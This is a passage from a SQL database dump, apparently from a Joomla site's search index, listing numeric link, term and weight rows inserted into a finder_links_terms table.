(238, 270696, 1.09669),
(238, 270697, 0.93331),
(238, 270698, 1.00331),
(238, 270699, 1.00331),
(238, 270700, 1.05),
(238, 270701, 1.00331),
(238, 270702, 1.21331),
(238, 271525, 1.00331),
(238, 271526, 1.07331),
(239, 272635, 0.95669),
(239, 272636, 1.09669),
(239, 272637, 0.98),
(239, 272638, 1.14331),
(239, 272639, 1.00331),
(239, 272640, 1.21331),
(239, 272641, 0.95669),
(239, 272642, 1.07331),
(239, 272643, 0.37331),
(239, 272644, 1.07331),
(239, 272645, 1.26),
(239, 272646, 0.32669),
(239, 272647, 0.98),
(239, 272648, 1.05),
(239, 272649, 0.28),
(239, 272650, 0.95669),
(239, 272651, 1.07331),
(239, 272652, 0.91),
(239, 272653, 1.09669),
(239, 272654, 1.82),
(239, 272655, 1.16669),
(239, 272656, 1.19),
(239, 272657, 0.98),
(239, 272658, 1.07331),
(239, 272659, 0.88669),
(239, 272660, 1.26),
(239, 272661, 1.09669),
(239, 272662, 1.07331),
(239, 272663, 1.05),
(239, 272664, 1.14331),
(239, 272665, 1.35331),
(239, 272666, 0.93331),
(239, 272667, 1.12),
(239, 272668, 1.02669),
(239, 272669, 1.14331),
(239, 272670, 0.98),
(239, 272671, 1.05),
(239, 272672, 0.37331),
(239, 272673, 1.09669),
(239, 272674, 1.19),
(239, 272675, 1.00331),
(239, 272676, 1.09669),
(239, 272677, 1.00331),
(239, 272678, 0.93331),
(239, 272679, 1.05),
(239, 272680, 0.91),
(239, 272681, 0.98),
(239, 272682, 1.16669),
(239, 272683, 0.95669),
(239, 272684, 1.02669),
(239, 272685, 0.95669),
(287, 272685, 0.95669),
(288, 272685, 0.95669),
(239, 272686, 1.05),
(239, 272687, 1.00331),
(239, 272688, 1.19),
(239, 272689, 0.93331),
(239, 272690, 1.07331),
(239, 272691, 0.88669),
(239, 272692, 1.14331),
(239, 272693, 0.88669),
(239, 272694, 0.93331),
(239, 272695, 1.23669),
(239, 272696, 1.02669),
(239, 272697, 1.02669),
(239, 272698, 0.84),
(239, 272699, 0.95669),
(239, 272700, 1.00331),
(239, 273745, 0.98),
(239, 273746, 0.91),
(239, 273747, 1.02669),
(239, 273748, 1.12),
(240, 274746, 0.98),
(240, 274747, 1.09669),
(240, 274748, 1.07331),
(240, 274749, 1.14331),
(240, 274750, 0.51331),
(240, 274751, 1.14331),
(240, 274752, 1.23669),
(240, 274753, 0.95669),
(240, 274754, 1.00331),
(240, 274755, 0.98),
(240, 274756, 0.98),
(240, 274757, 0.98),
(240, 274758, 0.93331),
(240, 274759, 1.09669),
(240, 274760, 0.84),
(240, 274761, 0.93331),
(240, 274762, 0.95669),
(240, 274763, 1.02669),
(240, 274764, 0.95669),
(240, 274765, 0.95669),
(240, 274766, 0.93331),
(240, 274767, 1.05),
(240, 274768, 0.91),
(240, 274769, 1.07331),
(240, 274770, 0.28),
(240, 274771, 0.98),
(240, 274772, 1.12),
(240, 274773, 1.00331),
(240, 274774, 1.09669),
(240, 274775, 1.09669),
(240, 274776, 0.88669),
(240, 274777, 1.00331),
(240, 274778, 0.95669),
(240, 274779, 1.07331),
(240, 274780, 0.23331),
(240, 274781, 0.95669),
(240, 274782, 1.02669),
(240, 274783, 1.77338),
(240, 274784, 0.98),
(240, 274785, 0.95669),
(240, 274786, 0.95669),
(240, 274787, 0.84),
(240, 274788, 1.00331),
(240, 274789, 0.98),
(240, 274790, 1.00331),
(240, 274791, 0.28),
(240, 274792, 0.98),
(240, 274793, 1.07331),
(240, 274794, 1.00331),
(240, 274795, 0.98),
(240, 274796, 0.93331),
(240, 274797, 1.00331),
(240, 274798, 1.02669),
(240, 274799, 1.02669),
(240, 274800, 1.02669),
(240, 275989, 1.16669),
(241, 276624, 0.32669),
(292, 276624, 0.32669),
(241, 276625, 0.95669),
(241, 276626, 1.21331),
(241, 276627, 0.91),
(241, 276628, 1.02669),
(241, 276629, 0.88669),
(241, 276630, 1.02669),
(241, 276631, 0.95669),
(241, 276632, 0.81669),
(241, 276633, 0.93331),
(241, 276634, 0.86331),
(241, 276635, 0.98),
(241, 276636, 1.00331),
(241, 276637, 1.02669),
(241, 276638, 1.09669),
(241, 276639, 1.05),
(241, 276640, 1.00331),
(241, 276641, 0.98),
(241, 276642, 1.07331),
(241, 276643, 0.95669),
(241, 276644, 1.19),
(241, 276645, 0.46669),
(241, 276646, 1.07331),
(241, 276647, 1.16669),
(241, 276648, 0.91),
(241, 276649, 0.98),
(241, 276650, 0.95669),
(241, 276651, 0.95669),
(241, 276652, 0.88669),
(241, 276653, 0.98),
(241, 276654, 0.95669),
(241, 276655, 1.09669),
(241, 276656, 0.86331),
(241, 276657, 0.95669),
(241, 276658, 1.68),
(241, 276659, 1.02669),
(241, 276660, 1.05),
(241, 276661, 1.05),
(241, 276662, 0.98),
(241, 277296, 0.98),
(242, 277824, 0.84),
(242, 277825, 0.95669),
(242, 277826, 0.37331),
(242, 277827, 0.95669),
(242, 277828, 1.16669),
(242, 277829, 0.23331),
(242, 277830, 0.93331),
(242, 277831, 1.02669),
(242, 277832, 1.05),
(242, 277833, 1.00331),
(242, 277834, 0.93331),
(304, 277834, 0.93331),
(305, 277834, 1.86662),
(242, 277835, 1.05),
(242, 277836, 0.88669),
(242, 277837, 0.98),
(242, 277838, 1.05),
(242, 277839, 0.93331),
(242, 277840, 1.09669),
(242, 277841, 0.84),
(242, 277842, 0.95669),
(242, 277843, 1.00331),
(242, 277844, 1.07331),
(242, 277845, 1.00331),
(242, 277846, 1.09669),
(242, 277847, 1.00331),
(242, 277848, 1.09669),
(242, 277849, 1.07331),
(242, 277850, 1.14331),
(242, 277851, 1.09669),
(242, 277852, 1.00331),
(242, 277853, 1.14331),
(242, 277854, 1.14331),
(242, 277855, 0.95669),
(242, 277856, 1.05),
(242, 277857, 0.95669),
(242, 277858, 1.07331),
(242, 277859, 1.00331),
(242, 277860, 1.09669),
(242, 277861, 0.91),
(242, 277862, 1.07331),
(242, 277863, 0.98),
(242, 277864, 1.00331),
(242, 277865, 0.37331);
INSERT INTO `y57u5_finder_links_terms9` (`link_id`, `term_id`, `weight`) VALUES
(242, 277866, 0.98),
(242, 277867, 1.05),
(242, 277868, 0.84),
(242, 277869, 1.02669),
(242, 277870, 1.12),
(242, 277871, 1.82),
(242, 277872, 1.14331),
(242, 277873, 1.00331),
(242, 277874, 0.37331),
(242, 277875, 0.95669),
(242, 277876, 1.05),
(242, 277877, 0.95669),
(242, 277878, 1.09669),
(242, 277879, 1.05),
(242, 277880, 1.30669),
(242, 277881, 0.98),
(242, 277882, 1.09669),
(242, 277883, 1.05),
(242, 277884, 1.12),
(242, 277885, 0.98),
(242, 277886, 1.07331),
(242, 277887, 1.05),
(242, 277888, 0.91),
(242, 277889, 1.02669),
(242, 277890, 0.42),
(242, 277891, 1.00331),
(242, 277892, 1.12),
(242, 277893, 0.32669),
(242, 277894, 0.95669),
(242, 277895, 1.05),
(242, 277896, 0.91),
(242, 277897, 1.05),
(242, 277898, 0.46669),
(242, 277899, 1.00331),
(242, 277900, 1.09669),
(242, 277901, 0.93331),
(242, 277902, 0.98),
(242, 277903, 1.02669),
(242, 277904, 0.93331),
(242, 277905, 0.98),
(242, 277906, 0.98),
(242, 277907, 1.00331),
(242, 277908, 1.12),
(242, 277909, 0.93331),
(242, 277910, 1.00331),
(242, 277911, 0.93331),
(242, 277912, 1.05),
(242, 279522, 0.18669),
(242, 279523, 0.98),
(242, 279524, 1.16669),
(242, 279525, 1.02669),
(242, 279526, 1.26),
(242, 279527, 1.14331),
(243, 281814, 0.91),
(243, 281815, 1.16669),
(243, 281816, 1.02662),
(243, 281817, 1.19),
(243, 281818, 1.28331),
(243, 281819, 1.21331),
(243, 281820, 1.35331),
(243, 281821, 1.02669),
(243, 281822, 1.07331),
(243, 281823, 0.95669),
(243, 281824, 1.09669),
(243, 281825, 1.07331),
(243, 281826, 1.26),
(243, 281827, 1.02669),
(243, 281828, 1.09669),
(243, 281829, 0.86331),
(243, 281830, 1.00331),
(243, 281831, 0.93331),
(243, 281832, 1.00331),
(243, 281833, 0.91),
(243, 281834, 1.07331),
(243, 281835, 1.07331),
(243, 281836, 1.02669),
(243, 281837, 1.23669),
(243, 281838, 0.98),
(243, 281839, 1.19),
(243, 281840, 0.23331),
(243, 281841, 0.98),
(243, 281842, 1.05),
(243, 281843, 0.42),
(243, 281844, 0.98),
(243, 281845, 1.07331),
(243, 281846, 1.12),
(243, 281847, 0.88669),
(243, 281848, 1.00331),
(243, 281849, 0.98),
(243, 282658, 0.14),
(243, 282659, 0.91),
(243, 282660, 0.98),
(243, 282661, 0.18669),
(243, 282662, 0.91),
(243, 282663, 1.07331),
(243, 282664, 0.32669),
(243, 282665, 0.95669),
(243, 282666, 1.05),
(243, 282667, 1.05),
(243, 282668, 1.35331),
(243, 282669, 1.02669),
(243, 282670, 0.88669),
(243, 282671, 0.95669),
(305, 283791, 0.86331),
(244, 283791, 1.72662),
(292, 283791, 2.58993),
(244, 283792, 1.91338),
(244, 283793, 1.00331),
(244, 283794, 0.98),
(244, 283795, 1.09669),
(244, 283796, 0.91),
(244, 283797, 1.14331),
(244, 283798, 0.86331),
(244, 283799, 1.05),
(244, 283800, 0.93331),
(244, 283801, 1.09669),
(244, 283802, 0.93331),
(244, 283803, 1.14331),
(244, 283804, 0.88669),
(244, 283805, 0.98),
(244, 283806, 0.98),
(244, 283807, 0.93331),
(244, 283808, 1.05),
(244, 283809, 0.74662),
(244, 283810, 0.93331),
(244, 283811, 1.02669),
(244, 283812, 1.00331),
(244, 283813, 1.12),
(244, 283814, 0.91),
(244, 283815, 1.02669),
(244, 283816, 1.07331),
(244, 283817, 0.98),
(244, 283818, 1.96),
(244, 284445, 0.88669),
(244, 284446, 1.02669),
(244, 284447, 0.98),
(244, 284448, 0.88669),
(244, 284449, 1.05),
(244, 284450, 0.88669),
(244, 284451, 0.95669),
(245, 284782, 0.93331),
(245, 284783, 1.05),
(245, 284784, 0.93331),
(245, 284785, 1.00331),
(245, 284786, 0.91),
(245, 284787, 1.09669),
(245, 284788, 0.93331),
(245, 284789, 1.12),
(245, 284790, 0.95669),
(245, 284791, 1.14331),
(245, 284792, 1.21331),
(245, 284793, 1.05),
(245, 284794, 0.18669),
(245, 284795, 0.88669),
(245, 284796, 1.02669),
(245, 284797, 0.93331),
(245, 284798, 1.00331),
(245, 284799, 0.23331),
(245, 284800, 1.09669),
(245, 284801, 1.23669),
(245, 284802, 1.07331),
(245, 284803, 0.88669),
(245, 284804, 1.02669),
(245, 285131, 0.86331),
(245, 285132, 1.02669),
(245, 285133, 0.88669),
(245, 285134, 0.93331),
(245, 285135, 0.95669),
(245, 285136, 1.12),
(245, 285137, 1.05),
(246, 285402, 1.07331),
(246, 285403, 1.14331),
(246, 285404, 0.98),
(246, 285405, 1.00331),
(246, 285406, 1.05),
(246, 285407, 1.09669),
(246, 285408, 0.88669),
(246, 285409, 1.00331),
(246, 285410, 0.98),
(246, 285411, 1.07331),
(246, 285412, 1.09669),
(246, 285413, 1.26),
(246, 285414, 1.02669),
(246, 285415, 1.16669),
(246, 285416, 1.07331),
(246, 285417, 1.16669),
(246, 285418, 1.09669),
(246, 285419, 1.4),
(246, 285420, 0.95669),
(246, 285421, 0.95669),
(246, 285422, 0.95669),
(246, 285896, 1.28331),
(246, 285897, 0.18669),
(246, 285898, 0.86331),
(246, 285899, 1.05),
(247, 286462, 0.91),
(247, 286463, 1.02669),
(247, 286464, 1.09669),
(247, 286465, 1.09669),
(247, 286466, 0.93331),
(247, 286467, 0.98),
(247, 286468, 0.95669),
(247, 286469, 1.07331),
(247, 286470, 0.84),
(247, 286471, 1.02669),
(247, 286472, 1.00331),
(248, 287373, 3.41312),
(248, 287374, 1.00331),
(248, 287375, 1.19),
(248, 287376, 0.91),
(248, 287377, 1.09669),
(248, 287378, 0.95669),
(248, 287379, 1.02669),
(248, 287380, 1.05),
(248, 287381, 0.98),
(248, 287382, 1.16669),
(248, 287383, 1.02669),
(248, 287384, 1.05),
(248, 287385, 1.09669),
(248, 287386, 1.12),
(248, 287387, 1.26),
(248, 287388, 0.42),
(248, 287389, 1.07331),
(248, 287390, 1.30669),
(248, 287391, 0.95669),
(248, 287392, 1.07331),
(248, 287393, 1.00331),
(248, 287394, 0.86331),
(248, 287395, 0.98),
(248, 287775, 0.98),
(248, 287776, 1.05),
(248, 287777, 0.32669),
(248, 287778, 1.00331),
(248, 287779, 1.26),
(249, 288420, 0.93331),
(249, 288421, 1.00331),
(249, 288422, 0.95669),
(249, 288423, 1.00331),
(249, 288424, 0.86331),
(249, 288425, 0.93331),
(249, 288426, 1.16669),
(249, 288427, 1.00331),
(249, 288428, 1.21331),
(249, 288429, 0.93331),
(249, 288430, 1.02669),
(249, 288431, 0.56),
(249, 288432, 1.07331),
(249, 288433, 1.12),
(249, 288434, 1.07331),
(249, 288435, 0.95669),
(249, 288436, 1.05),
(249, 288437, 0.98),
(249, 288438, 1.07331),
(249, 288806, 0.91),
(249, 288807, 0.98),
(249, 288808, 0.32669),
(249, 288809, 1.02669),
(249, 288810, 1.16669),
(249, 288811, 0.84),
(249, 288812, 1.00331),
(251, 289409, 0.09331),
(251, 289410, 0.84),
(251, 289411, 1.00331),
(251, 289474, 2.94),
(251, 289475, 3.36),
(251, 289476, 0.95669),
(251, 289477, 1.02669),
(251, 289478, 0.91),
(251, 289479, 1.00331),
(251, 289480, 0.91),
(251, 289481, 1.00331),
(251, 289482, 1.00331),
(251, 289483, 1.16669),
(251, 289484, 0.93331),
(251, 289485, 1.02669),
(251, 289486, 0.95669),
(251, 289487, 1.05),
(252, 289593, 2.1),
(252, 289594, 0.93331),
(252, 289595, 1.05),
(252, 289596, 0.93331),
(252, 289597, 1.07331),
(252, 289598, 1.05),
(252, 289599, 0.88669),
(252, 289600, 0.98),
(252, 289601, 0.98),
(252, 289602, 1.07331),
(252, 289603, 1.07331),
(252, 289604, 1.02669),
(252, 289605, 1.86662),
(252, 289606, 1.02669),
(252, 289607, 0.98),
(252, 289608, 0.98),
(252, 289609, 0.84),
(252, 289610, 1.07331),
(253, 290627, 0.86331),
(253, 290628, 0.95669),
(253, 290629, 1.21331),
(253, 290630, 0.93331),
(253, 290631, 0.93331),
(253, 290632, 1.00331),
(253, 290633, 1.00331),
(253, 290634, 1.19),
(253, 290635, 0.91),
(253, 290636, 1.00331),
(253, 290637, 1.09669),
(253, 290638, 1.26),
(253, 290639, 1.07331),
(253, 290640, 1.02669),
(253, 290641, 1.16669),
(253, 290642, 1.19),
(253, 290643, 0.93331),
(253, 290644, 1.02669),
(253, 290645, 1.00331),
(253, 290646, 0.18669),
(253, 290647, 0.91),
(253, 290648, 1.09669),
(253, 290649, 0.91),
(253, 290650, 1.07331),
(253, 290651, 1.96),
(253, 291181, 0.51331),
(253, 291182, 1.02669),
(253, 291183, 1.21331),
(253, 291184, 0.28),
(306, 291184, 0.28),
(253, 291185, 0.95669),
(253, 291186, 1.05),
(253, 291187, 0.98),
(253, 291188, 1.02669),
(253, 291189, 1.09669),
(254, 291700, 0.98),
(254, 291701, 1.16669),
(254, 291702, 0.95669),
(254, 291703, 1.02669),
(254, 291704, 0.86331),
(254, 291705, 1.05),
(254, 291706, 0.91),
(254, 291707, 1.02669),
(254, 291708, 1.05),
(254, 291709, 0.98),
(254, 291710, 0.91),
(254, 291711, 0.98),
(254, 291712, 1.07331),
(254, 291713, 1.19),
(254, 291714, 0.98),
(254, 291715, 1.14331),
(254, 291716, 0.93331),
(254, 291717, 1.00331),
(254, 291718, 0.98),
(254, 291719, 1.12),
(254, 291720, 1.00331),
(254, 291721, 1.07331),
(254, 291722, 0.93331),
(254, 291723, 1.07331),
(254, 291724, 1.05),
(254, 291725, 0.88669),
(254, 291726, 0.98),
(254, 291727, 0.37331),
(254, 291728, 0.95669),
(254, 291729, 1.09669),
(254, 291730, 0.18669),
(254, 291731, 0.86331),
(254, 291732, 0.98),
(254, 291733, 1.63338),
(254, 291734, 0.91),
(254, 291735, 0.98),
(254, 291736, 0.98),
(254, 291737, 1.02669),
(254, 291738, 1.00331),
(254, 291739, 0.98),
(254, 291740, 1.00331),
(254, 292472, 0.28),
(254, 292473, 0.91),
(254, 292474, 1.02669),
(254, 292475, 1.05),
(254, 292476, 1.23669),
(254, 292477, 0.98),
(254, 292478, 1.07331),
(254, 292479, 1.00331),
(254, 292480, 1.12),
(254, 292481, 1.00331),
(254, 292482, 1.07331),
(254, 292483, 0.95669),
(254, 292484, 1.12),
(255, 292662, 0.18669),
(306, 292662, 0.18669),
(255, 292663, 0.88669),
(255, 292664, 1.00331),
(255, 292665, 0.86331),
(255, 292666, 0.93331),
(255, 292667, 1.00331),
(255, 292668, 1.14331),
(255, 292669, 1.12),
(255, 292670, 1.23669),
(255, 292671, 1.02669),
(255, 292672, 1.12),
(255, 292673, 1.05),
(255, 292674, 1.14331),
(255, 292675, 1.09669),
(255, 292676, 1.12),
(255, 292677, 1.23669),
(255, 292678, 1.02669),
(255, 292679, 0.91),
(255, 292680, 1.05),
(255, 292681, 0.86331),
(255, 292682, 1.05),
(255, 292683, 0.88669),
(255, 292684, 0.93331),
(255, 292685, 0.91),
(255, 292686, 1.00331),
(255, 293034, 1.00331),
(256, 293194, 0.88669),
(256, 293195, 1.12),
(256, 293196, 0.37331),
(256, 293197, 0.95669),
(256, 293198, 1.07331),
(256, 293199, 1.02669),
(256, 293200, 1.02669),
(256, 293201, 0.86331),
(256, 293202, 0.91),
(256, 293203, 0.84),
(256, 293204, 0.91),
(256, 293205, 0.88669),
(256, 293206, 1.02669),
(256, 293207, 0.91),
(292, 293207, 0.91),
(256, 293208, 1.07331),
(256, 293209, 1.82),
(256, 293210, 2.05338),
(256, 293211, 1.05),
(256, 293212, 0.74662),
(256, 293213, 1.96),
(256, 293214, 1.19),
(256, 293215, 1.16669),
(256, 293216, 0.95669),
(256, 293217, 1.09669),
(256, 293218, 0.93331),
(256, 293219, 0.84),
(256, 293220, 0.93331),
(256, 293221, 0.95669),
(256, 293222, 1.07331),
(256, 293701, 1.02669),
(256, 293702, 1.09669),
(257, 294199, 0.91),
(257, 294200, 1.00331),
(257, 294201, 0.93331),
(257, 294202, 1.05),
(257, 294203, 1.00331),
(257, 294204, 0.86331),
(257, 294205, 0.95669),
(257, 294206, 0.86331),
(257, 294207, 0.95669),
(257, 294208, 0.95669),
(257, 294209, 1.05),
(257, 294210, 0.91),
(257, 294211, 1.09669),
(257, 294212, 1.07331),
(257, 294213, 1.02669),
(257, 294214, 1.09669),
(257, 294215, 1.00331),
(257, 294216, 1.00331),
(257, 294217, 1.00331),
(257, 294218, 1.09669),
(257, 294219, 0.98),
(257, 294220, 1.09669),
(257, 294221, 1.05),
(257, 294222, 0.14),
(257, 294223, 0.88669),
(257, 294224, 0.93331),
(257, 294225, 1.02669),
(257, 294226, 1.12),
(257, 294227, 1.05),
(257, 294228, 1.07331),
(257, 294229, 0.79331),
(257, 294230, 0.88669),
(257, 294669, 0.95669),
(257, 294670, 1.05),
(258, 295238, 0.88669),
(258, 295239, 0.98),
(258, 295240, 1.05),
(258, 295241, 0.93331),
(258, 295242, 0.84),
(258, 295243, 0.91),
(258, 295244, 1.05),
(258, 295245, 1.91338),
(258, 295246, 1.14331),
(258, 295247, 1.07331),
(258, 295248, 0.95669),
(258, 295249, 1.12),
(258, 295250, 0.98),
(258, 295251, 1.05),
(258, 295252, 0.93331),
(258, 295253, 1.12),
(258, 295254, 0.95669),
(258, 295255, 1.00331),
(258, 295256, 1.00331),
(258, 295257, 0.95669),
(258, 295772, 0.93331),
(258, 295773, 1.02669),
(258, 295774, 0.95669),
(258, 295775, 0.98),
(258, 295776, 1.05),
(258, 295777, 2.94),
(258, 295778, 1.12),
(258, 295779, 1.86662),
(258, 295780, 1.07331),
(258, 295781, 1.02669),
(258, 295782, 0.91),
(258, 295783, 1.05),
(258, 295784, 0.95669),
(258, 295785, 1.05),
(258, 295786, 0.93331),
(258, 295787, 0.98),
(258, 295788, 0.91),
(258, 295789, 1.00331),
(258, 295790, 0.28),
(258, 295791, 0.91),
(258, 295792, 1.00331),
(261, 296335, 0.91),
(261, 296336, 1.07331),
(261, 296337, 0.91),
(261, 296338, 0.95669),
(261, 296339, 1.00331),
(261, 296340, 1.07331),
(261, 296341, 0.98),
(261, 296342, 1.05),
(261, 296343, 0.95669),
(261, 296344, 1.02669),
(261, 296345, 0.93331),
(261, 296346, 1.05),
(261, 296347, 1.05),
(261, 296348, 1.00331),
(261, 296349, 1.09669),
(261, 296350, 0.98),
(261, 296351, 1.07331),
(261, 296352, 0.88669),
(261, 296353, 0.95669),
(261, 296354, 1.05),
(261, 296355, 1.12),
(261, 296356, 0.86331),
(261, 296357, 0.95669),
(261, 296358, 1.09669),
(261, 296359, 1.16669),
(261, 296360, 0.98),
(261, 296361, 1.09669),
(261, 296362, 1.07331),
(261, 296363, 1.02669),
(261, 296364, 1.05),
(261, 296365, 0.95669),
(261, 296366, 1.21331),
(261, 296367, 1.07331),
(261, 296368, 1.23669),
(261, 296369, 1.05),
(261, 296370, 1.05),
(261, 296371, 1.16669),
(261, 296372, 1.00331),
(261, 296373, 1.12),
(261, 296374, 0.91),
(305, 296374, 0.91),
(261, 296375, 1.02669),
(305, 296375, 1.02669),
(261, 296376, 0.86331),
(261, 296377, 1.12),
(261, 296378, 1.12),
(261, 296379, 0.98),
(261, 296380, 1.21331),
(261, 296873, 0.95669),
(261, 296874, 1.12),
(262, 297421, 0.93331),
(262, 297422, 1.16669),
(262, 297423, 0.91),
(262, 297424, 0.86331),
(262, 297425, 1.00331),
(262, 297426, 1.16669),
(262, 297427, 1.05),
(262, 297428, 1.21331),
(262, 297429, 0.91),
(262, 297430, 0.98),
(262, 297431, 0.95669),
(262, 297432, 1.07331),
(262, 297433, 1.68),
(262, 297434, 2.00662),
(262, 297435, 1.02669),
(262, 297436, 1.00331),
(262, 297437, 1.12),
(262, 297438, 0.91),
(262, 297439, 0.95669),
(262, 297440, 0.93331),
(262, 297441, 0.98),
(262, 297442, 1.07331),
(262, 297443, 1.19),
(262, 297444, 1.16669),
(262, 297445, 1.00331),
(262, 297446, 1.07331),
(262, 297447, 1.07331),
(262, 297448, 1.33),
(262, 297449, 0.98),
(262, 297450, 1.09669),
(262, 297451, 1.00331),
(262, 297452, 2.00662),
(262, 297453, 0.88669),
(262, 297454, 0.98),
(262, 297455, 0.88669),
(262, 297456, 1.00331),
(262, 297457, 1.02669),
(262, 297458, 1.14331),
(262, 297459, 1.82),
(262, 297460, 1.16669),
(262, 297461, 1.07331),
(305, 297462, 0.46669),
(262, 297462, 0.93338),
(262, 297463, 1.09669),
(262, 297464, 1.21331),
(262, 297465, 1.00331),
(262, 297466, 1.09669),
(262, 297467, 0.95669),
(262, 297468, 1.05),
(262, 297469, 0.95669),
(262, 297470, 1.12),
(262, 297471, 2.00662),
(262, 297472, 1.07331),
(262, 297473, 1.09669),
(262, 297474, 0.88669),
(262, 297475, 0.93331),
(262, 297476, 1.14331),
(262, 297477, 1.21331),
(262, 297478, 0.91),
(262, 297479, 1.02669),
(262, 297480, 1.02669),
(262, 297481, 0.98),
(262, 297482, 1.02669),
(262, 297483, 1.09669),
(262, 297484, 1.91338),
(262, 297485, 0.88669),
(262, 297486, 1.02669),
(262, 297487, 0.88669),
(262, 297488, 1.00331),
(262, 297489, 1.00331),
(262, 298210, 1.00331),
(262, 298211, 1.09669),
(263, 299434, 0.91),
(263, 299435, 0.93331),
(263, 299436, 0.93331),
(263, 299437, 1.00331),
(263, 299438, 1.00331),
(263, 299439, 1.16669),
(263, 299440, 0.98),
(263, 299441, 0.28),
(263, 299442, 1.05),
(263, 299443, 1.33),
(263, 299444, 0.93331),
(263, 299445, 1.07331),
(263, 299446, 1.07331),
(263, 299447, 0.95669),
(263, 299448, 1.12),
(263, 299449, 0.93331),
(263, 299450, 1.02669),
(263, 299451, 0.84),
(263, 299452, 0.95669),
(263, 299453, 0.98),
(263, 299454, 0.86331),
(263, 299455, 0.93331),
(263, 299456, 0.95669),
(263, 299457, 1.09669),
(263, 300032, 0.91),
(263, 300033, 1.02669),
(263, 300034, 1.05),
(263, 300035, 1.12),
(264, 300405, 0.95669),
(264, 300406, 1.02669),
(264, 300407, 0.95669),
(264, 300408, 1.09669),
(264, 300409, 1.05),
(264, 300410, 1.00331),
(264, 300411, 1.05),
(264, 300412, 1.19),
(264, 300413, 1.07331),
(264, 300414, 1.07331),
(264, 300415, 1.00331),
(264, 300416, 1.02669),
(264, 300783, 0.42),
(264, 300784, 0.98),
(264, 300785, 1.07331),
(267, 300946, 0.93331),
(267, 300947, 1.19),
(267, 300948, 0.93331),
(267, 300949, 1.14331),
(267, 300950, 0.86331),
(267, 300951, 0.98),
(267, 300952, 1.00331),
(267, 300953, 1.14331),
(267, 300954, 0.95669),
(267, 300955, 1.07331),
(267, 300956, 1.19),
(267, 300957, 0.95669),
(267, 300958, 1.07331),
(267, 300959, 0.95669),
(267, 300960, 1.05),
(267, 300961, 0.95669),
(267, 300962, 1.05),
(267, 300963, 1.07331),
(267, 300964, 1.23669),
(267, 300965, 1.09669),
(267, 300966, 1.26),
(267, 300967, 0.98),
(267, 300968, 1.05),
(267, 300969, 0.18669),
(288, 300969, 0.37338),
(267, 300970, 0.88669),
(267, 300971, 0.98),
(267, 300972, 0.86331),
(267, 300973, 0.95669),
(267, 300974, 0.98),
(267, 300975, 1.07331),
(267, 300976, 0.86331),
(267, 300977, 0.98),
(267, 300978, 0.86331),
(267, 300979, 0.98),
(267, 301450, 0.23331),
(267, 301451, 0.88669),
(267, 301452, 1.00331),
(268, 301989, 0.23331),
(268, 301990, 0.91),
(268, 301991, 1.02669),
(268, 301992, 1.00331),
(268, 301993, 0.91),
(268, 301994, 0.93331),
(268, 301995, 0.98),
(268, 301996, 1.16669),
(268, 301997, 1.23669),
(268, 301998, 0.86331),
(268, 301999, 1.05),
(268, 302000, 1.00331),
(268, 302001, 1.00331),
(268, 302002, 0.93331),
(268, 302003, 1.14331),
(268, 302004, 1.96),
(268, 302005, 2.38),
(268, 302006, 0.23331),
(268, 302007, 0.88669),
(268, 302008, 0.98),
(268, 302009, 0.98),
(268, 302010, 1.09669),
(268, 302011, 0.91),
(268, 302012, 1.02669),
(268, 302013, 0.91),
(268, 302014, 1.00331),
(268, 302015, 0.86331),
(268, 302016, 1.07331),
(268, 302017, 1.12),
(268, 302018, 1.19),
(268, 302019, 0.95669),
(268, 302020, 1.05),
(268, 302021, 0.95669),
(268, 302022, 1.05),
(268, 302572, 0.93331),
(268, 302573, 1.05),
(269, 302970, 0.88669),
(269, 302971, 1.09669),
(269, 302972, 1.05),
(269, 302973, 1.09669),
(269, 302974, 0.98),
(269, 302975, 1.09669),
(269, 302976, 0.95669),
(269, 302977, 1.09669),
(269, 302978, 0.88669),
(269, 302979, 0.98),
(269, 302980, 1.09669),
(269, 302981, 0.95669),
(269, 302982, 1.12),
(269, 302983, 1.00331),
(269, 302984, 1.09669),
(269, 302985, 0.93331),
(269, 302986, 1.05),
(269, 302987, 0.93331),
(269, 302988, 1.09669),
(269, 302989, 1.00331),
(269, 302990, 1.07331),
(269, 302991, 1.00331),
(269, 302992, 0.88669),
(269, 302993, 1.02669),
(269, 302994, 0.88669),
(269, 302995, 0.93331),
(272, 303948, 1.07331),
(272, 303949, 1.14331),
(274, 304073, 0.93331),
(274, 304074, 1.14331),
(274, 304075, 0.98),
(274, 304076, 0.84),
(274, 304077, 0.93331),
(274, 304078, 0.93331),
(274, 304079, 1.07331),
(274, 304080, 1.07331),
(274, 304081, 1.09669),
(274, 304082, 1.05),
(274, 304083, 1.23669),
(274, 304084, 1.02669),
(274, 304085, 1.23669),
(274, 304086, 1.02669),
(274, 304087, 1.14331),
(274, 304088, 0.88669),
(274, 304089, 1.05),
(274, 304090, 0.95669),
(274, 304091, 1.12),
(274, 304092, 1.05),
(274, 304093, 1.00331),
(274, 304094, 1.05),
(274, 304095, 0.23331),
(274, 304096, 0.86331),
(274, 304097, 0.98),
(274, 304098, 0.98),
(274, 304099, 1.05),
(274, 304100, 1.05),
(274, 304101, 0.98),
(274, 304102, 1.00331),
(275, 305050, 0.88669),
(275, 305051, 0.98),
(275, 305052, 0.88669),
(275, 305053, 1.07331),
(275, 305054, 1.05),
(275, 305055, 1.07331),
(275, 305056, 1.16669),
(275, 305057, 0.95669),
(275, 305058, 1.26),
(275, 305059, 1.00331),
(275, 305060, 0.93331),
(275, 305061, 1.05),
(275, 305062, 1.02669),
(275, 305063, 1.12),
(275, 305064, 0.95669),
(275, 305496, 1.12),
(287, 312811, 0.91),
(287, 312812, 1.05),
(287, 312813, 0.88669),
(287, 312814, 0.98),
(287, 312815, 1.14331),
(287, 312816, 0.95669),
(287, 312817, 1.09669),
(287, 312818, 0.95669),
(287, 312819, 1.07331),
(288, 313314, 0.91),
(288, 313315, 1.02669),
(288, 313316, 0.93331),
(288, 313317, 1.05),
(288, 313318, 0.93331),
(288, 313319, 0.81669),
(288, 313320, 0.86331),
(288, 313321, 0.84),
(288, 313322, 0.91),
(288, 313323, 0.98),
(288, 313324, 1.00331),
(288, 313325, 0.18669),
(288, 313326, 0.91),
(288, 313327, 1.14331),
(288, 313328, 0.93331),
(306, 313328, 0.93331),
(288, 313329, 1.05),
(288, 313330, 1.14331),
(288, 313331, 1.23669),
(288, 313332, 1.05),
(288, 313333, 1.12),
(288, 313334, 1.07331),
(288, 313335, 1.16669),
(288, 313336, 0.93331),
(288, 313337, 1.00331),
(288, 313338, 0.91),
(306, 313338, 0.91),
(288, 313339, 1.00331),
(288, 313340, 0.95669),
(288, 313341, 1.05),
(288, 313342, 0.98),
(288, 313343, 1.19),
